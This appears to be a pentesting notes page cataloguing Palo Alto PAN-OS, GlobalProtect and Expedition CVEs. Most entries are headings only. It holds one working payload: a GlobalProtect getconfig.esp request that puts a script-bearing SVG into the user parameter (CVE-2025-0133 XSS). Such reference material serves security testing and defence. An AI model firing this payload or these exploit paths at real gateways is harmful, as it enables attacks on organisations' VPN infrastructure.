Palo Alto

Palo Alto Exploits

ko-fi

CVE-2025-0133 - XSS

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer

Nuclei Template:

CVE-2025-0110 - PAN-OS Command Injection

CVE-2025-0108 - Authentication Bypass

CVE-2024-3400 Palo Alto File Write Exploit

PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474

Palo Alto Global Protect

Palo Alto Networks Expedition

CVE-2024-5910 - Remotely reset the Expedition application admin credentials

CVE-2024-9463 - RCE unauthenticated

Ref: https://x.com/watchtowrcyber/status/1844306954245767623?t=ibt0GSdt3qTVwHw54pdM1A&s=03

CVE-2024-9464 - Authenticated command injection vulnerability

CVE-2024-9465 - Unauthenticated SQL Injection

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

ko-fi

buymeacoffee

Last updated